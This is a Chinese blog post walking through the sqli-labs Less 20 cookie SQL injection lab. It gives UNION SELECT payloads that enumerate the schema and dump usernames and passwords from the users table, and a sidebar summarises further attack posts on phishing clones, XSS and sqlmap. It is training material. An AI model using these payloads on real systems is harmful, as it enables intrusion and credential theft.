17、cookie注入

最新推荐文章于 2024-05-30 16:16:07 发布
最新推荐文章于 2024-05-30 16:16:07 发布
阅读量233 收藏 1
点赞数
分类专栏: 小课堂 文章标签: sqli-labs less20 cookie注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103427038
版权

环境sqli-labs

less 20

1、在cookie里输入特殊字符报错

在这里插入图片描述
在这里插入图片描述
发现是单引号闭合

2、判断字段长度

在这里插入图片描述
order by 3正常,order by 4返回错误

3、union联合查询

a’ union select 1,2,3 #
在这里插入图片描述

4、获取数据库名称

a’ union select 1,2,database()#
在这里插入图片描述

5、获取表名

a’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’#
在这里插入图片描述

6、获取字段

union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#
在这里插入图片描述

7、获取字段值

union select 1,2,group_concat(concat_ws(’-’,id,username,password)) from users#
在这里插入图片描述
禁止非法,后果自负

欢迎关注公众号:web安全工具库
在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
cookie注入
wkend的博客
11-08 2670
0x00 什么是cookiecookie是当前识别用户,实现持久会话的最好的方式,有时也叫cookies,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。cookie最初是由网景公司开发的,现在所有的浏览器都支持。 “Cookie”是小量信息,由网络服务器发送出来以存储在网络浏览器上,从而下次这位独一无二的访客又回到该网络服务器时,可从该浏览...
cookie注入原理详解
weixin_50464560的博客
07-16 6800
那我们还是围绕以下几个问题来看看cookie注入: 1.什么是cookie注入? 2.为什么要cookie注入? 3.怎样cookie注入? 1.什么是cookie注入?   ♦cookie注入的原理是:就要修改cookie的值,   ♦cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post...
COOKIE注入
weixin_50464560的博客
07-10 1117
一、简介 Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数据库的注入...
COOKIE注入靶场实战
0nc3的博客
10-29 2662
0x00 前言 有点忘了sqlmap咋用,想多练下,然后发现一个cookie注入的靶场,学习一下 靶场地址: http://117.167.136.245:10181 0x01 手工测试 如何判断为COOKIE注入: 1.寻找形如“.asp?id=xx”类的带参数的URL。 2.去掉“id=xx”查看页面显示是否正常,如果不正常,说明参数在数据传递中是直接起作用的。 3.清空浏览器地址栏,输入“j...
SQL注入Cookie注入
weixin_43765321的博客
03-03 1089
1. Cookie背景介绍 Cookie最先是由Netscape (网景)公司提出的,Netscape官方文档中对Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。 Cookie的用途非常广泛,在网络中经常可以见到Cookie的身影。它通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 2. Cookie注入原理 Request对象的使用方法一般是这样的: reques
Access注入Cookie注入
最新发布
白帽黑客八哥的博客
05-30 1413
注:Cookie传参值需要URL编码Cookie 是指某些网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie 的出现是为了给用户更好的体验性,从安全的角度来讲,Cookie本身就是不安全的。
SQL注入-cookie注入
LJH1999ZN的博客
02-11 1906
cookie 注入
SQL注入cookie注入
游魂的博客
12-06 976
cookie注入: ASP环境: 在火狐浏览器中安装cookie插件 比如在代码层过滤了GET,POST请求方式中的参数可以中cookie注入 如:GET中x.asp?id=1’,x.asp?id=1 and 1=1提示非法参数情况,可以再cookie中进行尝试,在cookie中把?号后面的参数复制下来,写到cookie中,在url地址中删除ASP后面的所有参数访问即可,如cookie中:名字为i...
Cookie注入
LOnely_ec0li的博客
10-31 2866
1.先找cookie,URL中输入/?id=1 2.用burpsuite抓包 3.尝试注入,更改 id=123+union+select+database(),2# 查询到数据库名sqli 4.查 询 表 名 接 着 更 改 id=123 union select group_concat(table_name),2 from information_schema.tables wheretable_schema=’sqli’# 5.查 询 字 段 名 输 入 id=123...
Sqlmap2021 -- Cookie注入
weixin_41489908的博客
07-07 4060
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
kali工具 -- setoolkit(克隆网站及利用)
热门推荐
weixin_41489908的博客
01-06 1万+
书上说,如果有一天你梦见了一个很久没有见面的人,代表他正在遗忘你。。。 今天给大家介绍一款克隆网站工具:setoolkit 一、环境:kali 2019.04 二、用法: 1、打开终端,输入setoolkit 2、选择Social-Engineering Attacks 3、选择Website Attack Vectors 4、选择Credential Harvester Attack M...
28、XSS常见payload
weixin_41489908的博客
01-02 5536
环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "> 或者 "οnmοuseοve...
宽字节注入讲解
weixin_41489908的博客
09-09 5175
我讨厌现在的自己,一边压抑着自己的情绪,一边装作没事的样子,一到深夜就彻底崩溃了,天亮后还要微笑面对生活。。。 ---- 网易云热评 一、原理 1、单字节字符集: 所有的字符都使用一个字节来表示,比如 ASCII 编码(0-127) 2、多字节字符集: 在多字节字符集中,一部分字节用多个字节来表示,另一部分(可能没有)用单个字节来表示。 3、宽字节注入是利用mysql的一个特性,使用GBK编码的时候,会认为两个字符是一个汉字 二、addslashes()函数 1、addslashes(..
CMS指纹识别
weixin_41489908的博客
08-13 5149
一、源码目录 1、admin:后台源码 2、content:数据库与源码连接的源码 3、error:报错源码 4、include:包含文件源码 5、config:网站的配置信息 6、index:网站的主页源码 7、init:初始化源码 8、robots:爬虫规则 二、抓包分析cms指纹信息 1、通过BurpSuite抓取访问数据包 2、百度或谷歌搜索这些绝对路径:/e/member/login/loginjs.php?t=,直接就可以知道这是帝国cms 3、在线探
2、CMS识别
weixin_41489908的博客
11-18 4836
打开一个网站,我们可以先看一下该网站的CMS, 推荐使用在线工具: http://whatweb.bugscaner.com/look/ http://www.yunsee.cn/finger.html 也可以手动分析数据包地址的路径,然后百度关键目录,就可以基本判断 禁止非法,后果自负 ...
获取网站绝对路径常用方法
weixin_41489908的博客
08-15 3484
始终相信那些尝遍人生百味的人,灵魂会更加生动且干净。。。 ---- 网易云热评 一、报错显示 搜索inurl:warning,查看百度快照 二、搜索敏感文件 inurl:phpinfo.php 三、Windows下常用路径 c:/boot.ini //查看系统版本c:/windows/php.ini //php配置信息c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码c:/winnt/php.inic:/winnt/my.i.
18、cookie注入(base64加密)
weixin_41489908的博客
12-09 3253
环境sqli-labs less 21 1、通过抓包,我们发现cookie是base64编码的,解密后是admin 2、我们输入特殊符号,看报错信息,特殊符号也需要base64编码 3、我们通过’)进行闭合,返回正常 4、后面带入相关的查询语句并用Base64编码。查询语句参照less 20 less 22 用的是双引号闭合,注入语句同上。 禁止非法,后果自负 欢迎关注公众号:web安...
sql注入常用函数
weixin_41489908的博客
11-18 3160
​当所有情绪都堆在一起的时候,才发现自己已经不是那个一块糖就能开心的小孩子了。。。 ---- 网易云热评 一、MySql注入常用函数 1、system_user()系统用户名 2、user()用户名 3、current_user()当前用户名 4、session_user()链接数据库的用户名 5、database()数据库名 6、version()数据库版本 7、@@datadir数据库路径 8、@@basedir数据库安装路径 9、@@version_conpile_os操作系统.
web service渗透测试
weixin_41489908的博客
10-30 2404
​在街上看见一个人像你,我瞬间特别紧张,渴望是你,又害怕是你,直到看清不是你,我庆幸不是你,有遗憾不是你。。。 ---- 网易云热评 一、什么是Web Service Web Service是一个平台独立的,低耦合的,自包含的、基于可编程的web的应用程序,可使用开放的XML(标准通用标记语言下的一个子集)标准来描述、发布、发现、协调和配置这些应用程序,用于开发分布式的交互操作的应用程序。 Web Service技术, 能使得运行在不同机器上的不同应用无须借助附加的、专门的第三方软件或硬件,..
cookie注入工具
01-31
Cookie注入工具是一种用于进行网站漏洞测试和渗透测试的工具。它的作用是向目标网站发送恶意Cookie,以获取非法权限或者获取敏感信息。通常情况下,Cookie注入是指攻击者通过伪装成合法用户的身份,向目标网站发送带有恶意Cookie的HTTP请求,从而实现对网站的攻击或者获取用户数据的目的。 Cookie是网站使用的一种机制,用于存储用户的登录信息、会话状态以及个性化设置等数据。然而,当网站在处理Cookie时存在安全漏洞时,攻击者就可以利用Cookie注入工具来进行攻击。攻击者通过构造特定的恶意Cookie,来绕过网站的安全检查和认证控制,从而获得比合法用户更高的权限,例如管理员权限。 使用Cookie注入工具的攻击者可以对目标网站进行各种恶意操作,包括读取、修改、删除或添加敏感数据。例如,攻击者可以通过注入恶意Cookie,获取其他用户的个人信息、注入恶意代码、篡改网页内容或者劫持会话等。同时,攻击者还可以利用Cookie注入工具来进行跨站脚本攻击(XSS)或者会话劫持等攻击。 为了防止Cookie注入攻击,网站开发者需要加强对用户输入的过滤和验证,设置合理的安全策略,限制Cookie的范围和有效期,并进行定期的安全漏洞扫描和测试。对于安全研究人员和渗透测试人员来说,Cookie注入工具是一种重要的测试工具,可以帮助他们发现并修复网站的安全漏洞,提升网站的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值